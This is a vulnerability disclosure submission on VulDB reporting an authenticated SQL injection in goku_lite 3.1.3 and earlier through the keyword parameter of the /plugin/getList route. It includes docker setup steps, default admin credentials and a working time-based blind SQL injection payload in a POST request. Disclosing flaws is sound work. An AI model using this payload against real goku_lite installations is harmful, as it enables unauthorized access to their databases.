ଜମା କରନ୍ତୁ #51890: goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameterସୂଚନା

ଶୀର୍ଷକgoku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter
ବର୍ଣ୍ଣନା# Get start repo: ** https://github.com/eolinker/goku_lite ** - Execute docker command - Start goku ```bash docker run docker run -dt -p 7000:7000 -v /app/goku-ce/work:/app/goku-ce/console/work -e GOKU_ADMIN_PASSWORD=123456 --network=goku-ce --ip x.x.x.x --name goku-ce-console eolinker/goku-api-gateway-ce-console ``` user/pass: admin/123456 # vulnerability goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter use admin/123456 to login POC: Request URL: http://testlink:7000/plugin/getList Request Method: POST PostData: keyword=' AND 8247=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- PSdW Use sqlmap : ![](https://c2.im5i.com/2022/11/09/XOq61.png) ![](https://c2.im5i.com/2022/11/09/XOvUn.png) Please show QSec-Team in the detail of cve page. Thanks, QSec-Team
ଉପଭୋକ୍ତା
 qsec (UID 33968)
ଦାଖଲ11/11/2022 12:25 PM (3 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର11/11/2022 01:14 PM (48 minutes later)
ସ୍ଥିତିଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି213454 [eolinker goku_lite /plugin/getList route/keyword SQL ଇଞ୍ଜେକ୍ସନ]
ପଏଣ୍ଟ17

Might our Artificial Intelligence support you?

Check our Alexa App!